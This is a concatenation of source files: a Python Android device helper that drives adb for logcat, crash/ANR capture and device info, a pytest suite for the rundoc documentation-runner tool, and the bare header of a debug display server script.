p2 = subprocess.run(f'{adb} -s {self.device_id} shell ps | grep {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pid_list = p2.stdout.decode().split('\n')
for p2_line in pid_list:
if p2_line:
pid_target.append(str(p2_line).strip().split( )[1])
log_filtered_file_name = 'android_log_%s_%s.log' % (self.device_id, package_name)
self._log_filtered_file = os.path.abspath(os.path.join(tmp_dir, log_filtered_file_name))
crash_filtered_file_name = 'android_crash_%s_%s.log' % (self.device_id, package_name)
self._crash_filtered_file = os.path.abspath(os.path.join(crash_dir, crash_filtered_file_name))
anr_filtered_file_name = 'android_anr_%s_%s.log' % (self.device_id, package_name)
self._anr_filtered_file = os.path.abspath(os.path.join(anr_dir, anr_filtered_file_name))
def log_handler(logcat_process):
log_file = codecs.open(self._log_file, 'w', 'utf-8')
log_filtered_file = codecs.open(self._log_filtered_file, 'w', 'utf-8')
crash_filtered_file = codecs.open(self._crash_filtered_file, 'w', 'utf-8')
anr_filtered_file = codecs.open(self._anr_filtered_file, 'w', 'utf-8')
while True:
line = logcat_process.stdout.readline()
if not line:
context.application.socket_io.emit('log', self._log_cache, namespace='/android-plugin')
log_file.close()
log_filtered_file.close()
crash_filtered_file.close()
anr_filtered_file.close()
return
if self.log_filter(line, pid_target):
log_filtered_file.writelines(line.decode(encoding='UTF-8', errors='ignore'))
log_filtered_file.flush()
if self.crash_checker(line) and self.log_filter(line, pid_target):
crash_filtered_file.writelines(line.decode(encoding='UTF-8', errors='ignore'))
crash_filtered_file.flush()
# send Android.crash event
item = [{
'id':self.device_id,
'crash':[
{'name':'crash_log', 'path':self._crash_filtered_file},
]
}]
lyrebird.publish('android.crash', item)
if self.anr_checker(line):
anr_file_name = os.path.join(anr_dir, 'android_anr_%s.log' % self.device_id)
with codecs.open(anr_file_name, 'r', 'utf-8') as f:
anr_headline = f.readline()
anr_headline = f.readline()
p4 = subprocess.run(f'{adb} -s {self.device_id} shell ps | grep {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
pid_list = p4.stdout.decode().split('\n')
for p2_line in pid_list:
if p2_line:
pid_target.append(str(p2_line).strip().split( )[1])
if str(anr_headline).strip().split()[2] in pid_target:
subprocess.run(f'{adb} -s {self.device_id} pull "/data/anr/traces.txt" {self._anr_filtered_file}', shell=True, stdout=subprocess.PIPE)
# send Android.crash event
item = [{
'id':self.device_id,
'crash':[
{'name':'anr_log', 'path':self._anr_filtered_file},
]
}]
lyrebird.publish('android.crash', item)
self._log_cache.append(line.decode(encoding='UTF-8', errors='ignore'))
if len(self._log_cache) >= 10:
context.application.socket_io.emit('log', self._log_cache, namespace='/android-plugin')
log_file.writelines(self._log_cache)
log_file.flush()
self._log_cache = []
threading.Thread(target=log_handler, args=(p,)).start()
def log_filter(self, line, pid_target):
if not line:
return False
line_list = str(line).strip().split()
if len(line_list) <= 2:
return False
if line_list[2] not in pid_target:
return False
return True
def crash_checker(self, line):
crash_log_path = os.path.join(crash_dir, 'android_crash_%s.log' % self.device_id)
if str(line).find('FATAL EXCEPTION') > 0:
self.start_catch_log = True
self._log_crash_cache.append(line.decode(encoding='UTF-8', errors='ignore'))
return True
elif str(line).find('AndroidRuntime') > 0 and self.start_catch_log:
self._log_crash_cache.append(line.decode(encoding='UTF-8', errors='ignore'))
return True
else:
self.start_catch_log = False
with codecs.open(crash_log_path, 'w', 'utf-8') as f:
f.write(''.join(self._log_crash_cache))
return False
def anr_checker(self, line):
if str(line).find('ANR') > 0 and str(line).find('ActivityManager') > 0:
self.get_anr_log()
return True
else:
return False
def get_anr_log(self):
anr_file_name = os.path.join(anr_dir, 'android_anr_%s.log' % self.device_id)
p = subprocess.run(f'{adb} -s {self.device_id} pull "/data/anr/traces.txt" {anr_file_name}', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
self._anr_file = os.path.abspath(anr_file_name)
@property
def device_info(self):
if not self._device_info:
self._device_info = self.get_properties()
return self._device_info
def get_properties(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell getprop', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def get_all_packages(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell pm list packages', shell=True, stdout=subprocess.PIPE)
res = []
if p.returncode == 0:
output = p.stdout.decode()
res = [item.split(':')[1] for item in output.strip().split('\n') if item]
return res
def package_info(self, package_name):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys package {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
return App.from_raw(package_name, p.stdout.decode())
def package_meminfo(self, package_name):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys meminfo {package_name}', shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def device_cpuinfo(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys cpuinfo', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def stop_log(self):
if self._log_process:
self._log_process.kill()
self._log_process = None
def take_screen_shot(self):
if not os.path.exists(screenshot_dir):
os.makedirs(screenshot_dir)
timestrap = int(time.time())
screen_shot_file = os.path.abspath(os.path.join(screenshot_dir, f'android_screenshot_{self.device_id}_{timestrap}.png'))
p = subprocess.run(f'{adb} -s {self.device_id} exec-out screencap -p > {screen_shot_file}', shell=True)
if p.returncode == 0:
return dict({
'screen_shot_file': screen_shot_file,
'device_id': self.device_id,
'timestrap': timestrap
})
return {}
def start_app(self, start_activity, ip, port):
p = subprocess.run(f'{adb} -s {self.device_id} shell am start -n {start_activity} --es mock http://{ip}:{port}/mock/ --es closeComet true', shell=True)
return True if p.returncode == 0 else False
def stop_app(self, package_name):
p = subprocess.run(f'{adb} -s {self.device_id} shell am force-stop {package_name}', shell=True)
return True if p.returncode == 0 else False
def get_device_ip(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell ip -b -4 address', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
output = [line.strip() for line in p.stdout.decode().strip().split('\n')]
for net_line in output:
if 'wlan0' in net_line:
ipv4_list = net_line.split()
break
else:
return ''
for index, char in enumerate(ipv4_list):
# ipv4_address, which we need, is behind of 'inet'
if char == 'inet':
# example of ipv4_address: 192.168.110.111/23
return ipv4_list[index+1].split('/')[0]
return ''
def get_device_resolution(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys window displays', shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
output = [line.strip() for line in p.stdout.decode().strip().split('\n')]
for index, char in enumerate(output):
if char and char.startswith('Display'):
# display_str, which we need, is in the next line of 'Display'
display_str = output[index+1]
break
else:
return ''
# example of display: 'init=1080x1920 420dpi cur=1080x1920 app=1080x1794 rng=1080x1017-1794x1731',
for resolution_str in display_str.split():
if resolution_str.startswith('init'):
return resolution_str[len('init='):]
return ''
def get_release_version(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell getprop ro.build.version.release', shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
return p.stdout.decode().strip()
def to_dict(self):
device_info = {k: self.__dict__[k] for k in self.__dict__ if not k.startswith('_')}
# get additional device info
prop_lines = self.device_info
if not prop_lines:
return device_info
for line in prop_lines:
            # Baseband version
if 'ro.build.expect.baseband' in line:
baseband = line[line.rfind('[')+1:line.rfind(']')].strip()
device_info['baseBand'] = baseband
            # Build ID
if 'ro.build.id' in line:
build_id = line[line.rfind('[') + 1:line.rfind(']')].strip()
device_info['buildId'] = build_id
            # Android version
if 'ro.build.version.release' in line:
build_version = line[line.rfind('[') + 1:line.rfind(']')].strip()
device_info['releaseVersion'] = build_version
return device_info
def devices():
check_android_home()
res = subprocess.run(f'{adb} devices -l', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = res.stdout.decode()
err_str = res.stderr.decode()
online_devices = {}
# ADB command error
if res.returncode != 0:
print('Get devices list error', err_str)
return online_devices
lines = [line for line in output.split('\n') if line]
if len(lines) > 1:
for line in lines[1:]:
device = Device.from_adb_line(line)
online_devices[device.device_id] = device
devices_list = [on_device for on_device in list(online_devices.keys())]
last_devices_str = lyrebird.state.get('android.device') if lyrebird.state.get('android.device') else []
last_devices_list = [last_device.get('id') for last_device in last_devices_str]
if devices_list != last_devices_list:
devices_info_list = []
for device_id in online_devices:
device_detail = online_devices[device_id]
            if device_detail.device_info is None:
continue
item = {
'id': device_id,
'info': {
'product': device_detail.product,
'model': device_detail.model,
'os': device_detail.get_release_version(),
'ip': device_detail.get_device_ip(),
'resolution': device_detail.get_device_resolution()
}
}
package_name = config.load().package_name
            app = device_detail.package_info(package_name)
if app.version_name:
item['app'] = {
'packageName': package_name,
'startActivity': app.launch_activity,
'version': app.version_name
}
devices_info_list.append(item)
lyrebird.publish('android.device', devices_info_list, state=True)
return online_devices
|
test_unit.py
|
import pytest
from rundoc import BadInterpreter, BadEnv, RundocException, CodeFailed
import rundoc.block as rb
import rundoc.commander as rc
import rundoc.parsers as rp
import rundoc.__main__ as rm
from pygments import highlight
from pygments.formatters import Terminal256Formatter
from pygments.lexers import get_lexer_by_name
from pygments.styles.manni import ManniStyle
from pygments.styles.native import NativeStyle
from types import *
import inspect
import io
import json
import os
import re
import stat
import tempfile
import threading
import time
###
# Fixtures
###
@pytest.fixture
def environment():
e = {
'custom_var1': '1',
'CUSTOM_VAR2': '2',
'custom_var3': 'some text',
}
for key in e:
os.environ[key] = e[key]
return e
@pytest.fixture
def orderedenv(environment):
oenv = rc.OrderedEnv()
for var in environment:
oenv.append(var, environment[var])
return oenv
@pytest.fixture
def test_vars():
return [
('test1', 'value111'),
('test2', 'value222'),
('test3', 'value333'),
]
@pytest.fixture
def sandbox():
with tempfile.TemporaryDirectory() as directory:
yield directory
@pytest.fixture
def dummy_file(sandbox, environment):
fpath = os.path.join(sandbox, 'dummy_file')
with open(fpath, 'a+') as f:
f.write('some {dummy} data\n')
for key in environment:
f.write(' abc %:' + key + ':%')
yield fpath
@pytest.fixture
def docblock_bash():
code = 'echo "it is working"'
# use bash as interpreter
tags = [ 'bash', 'test', 'main' ]
light = False
return rb.DocBlock(code, tags, light)
@pytest.fixture
def docblock_bash_light():
code = 'echo "it is working"'
# use bash as interpreter
tags = [ 'bash', 'test', 'main' ]
# color print optimized for light background terminal
light = True
return rb.DocBlock(code, tags, light)
@pytest.fixture
def docblock_unknown():
code = 'echo "it is working"'
# use binary in path as interpreter but one that has no code highlighting
tags = [ 'cd', 'test', 'main' ]
light = False
return rb.DocBlock(code, tags, light)
@pytest.fixture
def mkd_file():
    data = b'```bash#test\nls\n```\n\n```bash#test\nls -al\n```'
f = io.BytesIO()
f.write(data)
f.seek(0)
return f
###
# Tests for block.py
###
REGISTERED_BLOCK_ACTIONS = 5
def test_block_action():
assert len(rb.block_actions) == REGISTERED_BLOCK_ACTIONS
def dummy_block_action(args, contents):
return 0
rb.block_action(dummy_block_action)
assert len(rb.block_actions) == REGISTERED_BLOCK_ACTIONS + 1
assert type(rb.block_actions['dummy-block-action']) == FunctionType
assert rb.block_actions['dummy-block-action'] == dummy_block_action
del(rb.block_actions['dummy-block-action'])
assert len(rb.block_actions) == REGISTERED_BLOCK_ACTIONS
def test_fill_env_placeholders__valid(environment):
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
assert rb.fill_env_placeholders(before) == after
def test_fill_env_placeholders__unclosed(environment):
invalid_env = 'Text %:invalid_var '
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
before = invalid_env + before + invalid_env
after = invalid_env + after + invalid_env
assert rb.fill_env_placeholders(before) == after
def test_fill_env_placeholders__unopened(environment):
invalid_env = 'Text invalid_var:% '
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
before = invalid_env + before + invalid_env
after = invalid_env + after + invalid_env
assert rb.fill_env_placeholders(before) == after
def test_write_file_action__no_fill(sandbox):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = 'some random text\nmore text'
rb._write_file_action({0:testfile, 1:'774'}, before, fill=False)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
def test_write_file_action__fill(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = 'some random text\nmore text'
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._write_file_action({0:testfile, 1:'774'}, before, fill=True)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
def test_create_file__fresh(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._create_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
def test_create_file__existing(sandbox, environment, dummy_file):
testfile = dummy_file
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._create_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
def test_r_create_file__fresh(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_create_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
def test_r_create_file__existing(sandbox, environment, dummy_file):
testfile = dummy_file
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_create_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
def test_create_file__permissions(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
permissions = '777'
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._create_file({0:testfile, 1:permissions}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
assert str(oct(os.stat(testfile)[stat.ST_MODE]))[-3:] == permissions
def test_r_create_file__permissions(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
permissions = '777'
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_create_file({0:testfile, 1:permissions}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
assert str(oct(os.stat(testfile)[stat.ST_MODE]))[-3:] == permissions
def test_append_file__fresh(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._append_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
def test_append_file__existing(sandbox, environment, dummy_file):
testfile = dummy_file
with open(dummy_file, 'r') as f:
initial_contents = f.read()
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._append_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == initial_contents + before + '\n'
def test_r_append_file__fresh(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_append_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
def test_r_append_file__existing(sandbox, environment, dummy_file):
testfile = dummy_file
with open(dummy_file, 'r') as f:
initial_contents = f.read()
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_append_file({0:testfile}, before)
with open(testfile, 'r') as f:
assert f.read() == initial_contents + after + '\n'
def test_append_file__permissions(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
permissions = '777'
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._append_file({0:testfile, 1:permissions}, before)
with open(testfile, 'r') as f:
assert f.read() == before + '\n'
assert str(oct(os.stat(testfile)[stat.ST_MODE]))[-3:] == permissions
def test_r_append_file__permissions(sandbox, environment):
testfile = os.path.join(sandbox, inspect.currentframe().f_code.co_name)
permissions = '777'
before = ''
for key in environment:
before += ' abc %:' + key + ':%'
after = before.replace('%:', '{').replace(':%', '}').format(**environment)
rb._r_append_file({0:testfile, 1:permissions}, before)
with open(testfile, 'r') as f:
assert f.read() == after + '\n'
assert str(oct(os.stat(testfile)[stat.ST_MODE]))[-3:] == permissions
def test_docblock_init_with_bad_interpreter():
with pytest.raises(BadInterpreter):
rb.DocBlock(tags=['bad_interpreter'], code='')
def test_get_block_action__known_actions():
for action in {
'create-file',
'r-create-file',
'append-file',
'r-append-file',
}:
assert isinstance(rb.get_block_action(action + ':text'), LambdaType)
def test_get_block_action__undefined_action():
assert rb.get_block_action('unknown:text') == None
def test_docblock__get_lexer__bash(docblock_bash):
db_lexer = docblock_bash.get_lexer()
pygments_lexer = get_lexer_by_name('bash')
assert db_lexer.__class__ == pygments_lexer.__class__
def test_docblock__get_lexer__unknown(docblock_unknown):
db_lexer = docblock_unknown.get_lexer()
assert db_lexer == None
def test_docblock__str(docblock_bash):
code = docblock_bash.code
interpreter = docblock_bash.interpreter
lexer_class = get_lexer_by_name(interpreter)
s = highlight(code, lexer_class, Terminal256Formatter(style=NativeStyle))
assert str(docblock_bash) == s
def test_docblock_str__last_run(docblock_bash):
user_code = 'echo "changed"'
docblock_bash.runs.append(
{
'user_code': user_code,
'output': '',
'retcode': None,
'time_start': None,
'time_stop': None,
}
)
docblock_bash.last_run['user_code'] = user_code
interpreter = docblock_bash.interpreter
lexer_class = get_lexer_by_name(interpreter)
s = highlight(user_code, lexer_class, Terminal256Formatter(style=NativeStyle))
assert str(docblock_bash) == s
def test_docblock__str__light(docblock_bash_light):
code = docblock_bash_light.code
interpreter = docblock_bash_light.interpreter
lexer_class = get_lexer_by_name(interpreter)
s = highlight(code, lexer_class, Terminal256Formatter(style=ManniStyle))
assert str(docblock_bash_light) == s
def test_docblock__get_dict(docblock_bash):
assert type(docblock_bash.get_dict()) == type({})
bash_block_dict = {
'interpreter': 'bash',
'code': 'echo "this is a test"',
'tags': [ 'bash', 'test', 'main' ],
'runs': []
}
docblock = rb.DocBlock(
bash_block_dict['code'],
bash_block_dict['tags'],
)
actual_dict = docblock.get_dict()
assert bash_block_dict == actual_dict
docblock.run(prompt=False)
while docblock.process:
time.sleep(0.1)
actual_dict = docblock.get_dict()
for key in ('interpreter', 'code', 'tags'):
assert bash_block_dict[key] == actual_dict[key]
assert actual_dict['runs'][0]['user_code'] == docblock.code
assert actual_dict['runs'][0]['output'] == 'this is a test\n'
assert actual_dict['runs'][0]['retcode'] == 0
assert actual_dict['runs'][0]['time_start'] > 0
assert actual_dict['runs'][0]['time_stop'] > 0
def docblock_worker(docblock):
docblock.run(prompt=False)
def test_docblock__run_and_kill():
# Note that kill will only send SIGKILL to the running process without
    # any knowledge on how this will be handled. What is guaranteed is that
# process.poll() will contain some exitcode.
docblock = rb.DocBlock(
'echo "start"\nsleep 2\necho "this is test"',
['bash', 'test'],
)
assert docblock.process == None
t = threading.Thread(target=docblock_worker, args=(docblock,))
t.start()
time.sleep(1)
assert docblock.process and docblock.process.poll() is None
docblock.kill()
time.sleep(0.1)
assert docblock.process and type(docblock.process.poll()) is int
def test_docblock__run_action(dummy_file):
docblock = rb.DocBlock(
'some content',
['r-create-file:{}'.format(dummy_file), 'test'],
)
docblock.run(prompt=False)
assert docblock.last_run['retcode'] == 0
def test_docblock__run_unknown_action():
with pytest.raises(BadInterpreter):
docblock = rb.DocBlock(
'some content',
['unknown-action:bad-data', 'test'],
)
###
# Tests for commander.py
###
def test_orderedenv__str(orderedenv, environment):
for var in environment:
assert orderedenv[var] == environment[var]
assert len(orderedenv) == len(environment)
assert "\n".join([ var+"="+environment[var] for var in environment ]) == \
str(orderedenv)
def test_orderedenv__append(orderedenv):
s = str(orderedenv)
s_append = '\ntest=value123'
orderedenv.append('test','value123')
assert str(orderedenv) == s + s_append
def test_orderedenv__extend(orderedenv, test_vars):
s = str(orderedenv)
s_extend = '\n' + '\n'.join([ '{0}={1}'.format(vars[0], vars[1]) for vars in test_vars ])
orderedenv_extend = rc.OrderedEnv()
for var, value in test_vars:
orderedenv_extend.append(var, value)
orderedenv.extend(orderedenv_extend)
assert str(orderedenv) == s + s_extend
def test_orderedenv__import_string(orderedenv, test_vars):
s = str(orderedenv)
s_import = '\n' + '\n'.join([ '{0}={1}'.format(vars[0], vars[1]) for vars in test_vars ])
orderedenv.import_string(s_import)
assert str(orderedenv) == s + s_import
def test_orderedenv__import_string__no_equal(orderedenv, test_vars):
s_import = "bad env format"
with pytest.raises(BadEnv):
orderedenv.import_string(s_import)
def test_orderedenv__import_string__missing_var(orderedenv, test_vars):
s_import = "=value777"
with pytest.raises(BadEnv):
orderedenv.import_string(s_import)
def test_orderedenv__load(orderedenv, test_vars):
s = str(orderedenv)
s_load = '\n' + '\n'.join([ '{0}={1}'.format(vars[0], vars[1]) for vars in test_vars ])
for var, value in test_vars:
os.environ[var] = value
for var, value in test_vars:
orderedenv.append(var, '')
orderedenv.load()
assert str(orderedenv) == s + s_load
def test_orderedenv__inherit_existing_env(orderedenv, test_vars):
s = str(orderedenv)
s_load = '\n' + '\n'.join([ '{0}={1}'.format(vars[0], vars[1]) for vars in test_vars ])
for var, value in test_vars:
os.environ[var] = value
for var, value in test_vars:
orderedenv.append(var, 'bad value')
orderedenv.inherit_existing_env()
assert str(orderedenv) == s + s_load
def test_doccommander_doc_block__step():
dc = rc.DocCommander()
dc.add('ls\n', ['bash','test1'])
dc.step = 1
assert dc.doc_block == dc.doc_blocks[0]
def test_doccommander_doc_block__no_step():
dc = rc.DocCommander()
dc.add('ls\n', ['bash','test1'])
assert dc.doc_block == None
def test_doccommander_get_dict():
dc = rc.DocCommander()
dc.add('ls\n', ['bash','test1'])
assert dc.get_dict() == {
"code_blocks": [
{
"code": "ls\n",
"tags": ["bash", "test1"],
"interpreter": "bash",
"runs": []
}
], "env": {}
}
def test_doccommander_add():
dc = rc.DocCommander()
assert len(dc.doc_blocks) == 0
dc.add('ls\n', ['bash','test1'])
assert len(dc.doc_blocks) == 1
assert dc.doc_blocks[0].code == 'ls\n'
assert dc.doc_blocks[0].tags == [ 'bash', 'test1' ]
dc.add('ls -al\n', ['bash','test2'])
assert len(dc.doc_blocks) == 2
assert dc.doc_blocks[0].code == 'ls\n'
assert dc.doc_blocks[0].tags == [ 'bash', 'test1' ]
assert dc.doc_blocks[1].code == 'ls -al\n'
assert dc.doc_blocks[1].tags == [ 'bash', 'test2' ]
def doccommander_worker(dc):
try:
dc.run()
except ValueError as e:
        # in case the output file was closed prematurely
pass
def test_doccommander_add__while_running():
dc = rc.DocCommander()
dc.add('sleep 2\n', ['bash','test1'])
t = threading.Thread(target=doccommander_worker, args=(dc,))
t.start()
time.sleep(1)
with pytest.raises(RundocException):
dc.add('echo "bad"\n', ['bash','test1'])
def test_doccommander_add__unknown_interpreter():
dc = rc.DocCommander()
with pytest.raises(SystemExit):
dc.add('sleep 1\n', ['unknown','test1'])
def test_doccommander_die_with_grace(dummy_file):
dc = rc.DocCommander()
dc.add('echo "test"\n', ['bash','test1'])
dc.add('sleep 2\n', ['bash','test1'])
with open(dummy_file, 'w') as f:
dc.output = f
t = threading.Thread(target=doccommander_worker, args=(dc,))
t.start()
time.sleep(1)
dc.die_with_grace()
with open(dummy_file, 'r') as f:
output = json.loads(f.read())
assert output['code_blocks'][0]['runs'][0]['output'] == 'test\n'
def test_doccommander_write_output(dummy_file):
dc = rc.DocCommander()
dc.add('echo "test"\n', ['bash','test1'])
dc.run()
with open(dummy_file, 'w') as f:
dc.output = f
dc.write_output()
with open(dummy_file, 'r') as f:
output = json.loads(f.read())
assert len(output['code_blocks']) == 1
def test_doccommander_run(dummy_file):
dc = rc.DocCommander()
dc.add('echo "test1"\n', ['bash','test1'])
dc.add('echo "test2"\n', ['bash','test1'])
dc.add('echo "test3"\n', ['bash','test1'])
with open(dummy_file, 'w') as f:
dc.run(inherit_env=True, output=f)
assert len(dc.get_dict()['code_blocks']) == 3
for cb in dc.get_dict()['code_blocks']:
assert len(cb['runs']) == 1
def test_doccommander_run__failed():
dc = rc.DocCommander()
dc.add('cat /non_existent', ['bash','test1'])
with pytest.raises(CodeFailed):
dc.run(retry=5, retry_pause=0.1)
###
# Tests for parsers.py
###
def test_parsers__mkd_to_html__select_none():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data) == '<pre><code class="bash test1 rundoc_selected">ls\n</code></pre>\n\n<pre><code class="bash test2 rundoc_selected">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_bash():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, 'bash') == '<pre><code class="bash test1 rundoc_selected">ls\n</code></pre>\n\n<pre><code class="bash test2 rundoc_selected">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_test1():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, 'test1') == '<pre><code class="bash test1 rundoc_selected">ls\n</code></pre>\n\n<pre><code class="bash test2">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_test2():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, 'test2') == '<pre><code class="bash test1">ls\n</code></pre>\n\n<pre><code class="bash test2 rundoc_selected">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_bash_diselect_test2():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, 'bash', '', 'test2') == '<pre><code class="bash test1 rundoc_selected">ls\n</code></pre>\n\n<pre><code class="bash test2">ls -al\n</code></pre>'
def test_parsers__mkd_to_html__select_must_have_test2():
data = '```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
assert rp.mkd_to_html(data, '', 'test2', '') == '<pre><code class="bash test1">ls\n</code></pre>\n\n<pre><code class="bash test2 rundoc_selected">ls -al\n</code></pre>'
def test_parsers__parse_doc():
f = io.StringIO()
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
expected = rc.DocCommander()
expected.add('ls\n', ['bash','test1'])
expected.add('ls -al\n', ['bash','test2'])
f.write(data)
f.seek(0)
c = rp.parse_doc(f, 'bash')
assert c.get_dict() == expected.get_dict()
def test_parsers__parse_doc__single_session():
f = io.StringIO()
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
expected = rc.DocCommander()
expected.add('ls\nls -al\n', ['bash'])
expected.env.import_string("a=b")
f.write(data)
f.seek(0)
c = rp.parse_doc(f, single_session='bash')
assert c.get_dict() == expected.get_dict()
def test_parsers__parse_output():
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
c1 = rp.parse_doc(input)
json1 = json.dumps(c1.get_dict())
output = io.StringIO()
output.name = 'test'
c1.output = output
c1.run()
output.seek(0)
c2 = rp.parse_output(output)
json2 = json.dumps(c2.get_dict())
assert json1 == json2
def test_parsers__get_tags():
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
tags = rp.get_tags(input)
assert len(tags) == 4
for tag, num in tags:
if tag == 'bash':
assert num == 2
elif tag in [ 'env', 'test1', 'test2' ]:
assert num == 1
else:
assert tag == ''
def test_parsers__get_blocks():
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
got_blocks = rp.get_blocks(input, pretty=True)
ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')
got_blocks = ansi_escape.sub('', got_blocks)
expect = '1. [bash] bash#test1\n=================\nls\n\n2. [bash] bash#test2\n=================\nls -al\n\n'
assert got_blocks == expect
def test_parsers__get_blocks__json():
data = '```env\na=b\n```\n```bash#test1\nls\n```\n\n```bash#test2\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
got_blocks = rp.get_blocks(input)
input.seek(0)
expect = rp.parse_doc(input)
assert json.loads(got_blocks) == expect.get_dict()
def test_parsers__get_clean_doc():
data = '```env\na=b\n```\nyes\n```bash#test1\nls\n```\n\n- Test ```bash:me\n\n```bash (\\/me^) {&}_[2=\']-$%!*:test2\nls -al\n```'
expect = '```env\na=b\n```\nyes\n```bash\nls\n```\n\n- Test ```bash:me\n\n```bash (\\/me^) {&}_[2=\']-$%!*\nls -al\n```'
input = io.StringIO()
input.write(data)
input.seek(0)
assert rp.get_clean_doc(input) == expect
###
# Tests for __main__.py
###
def test_main_add_options():
rm.add_options(rm._run_control_options)
rm.add_options(rm._run_specific_options)
rm.add_options(rm._output_style_options)
rm.add_options(rm._tag_options)
|
debug_display_server.py
|
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
#
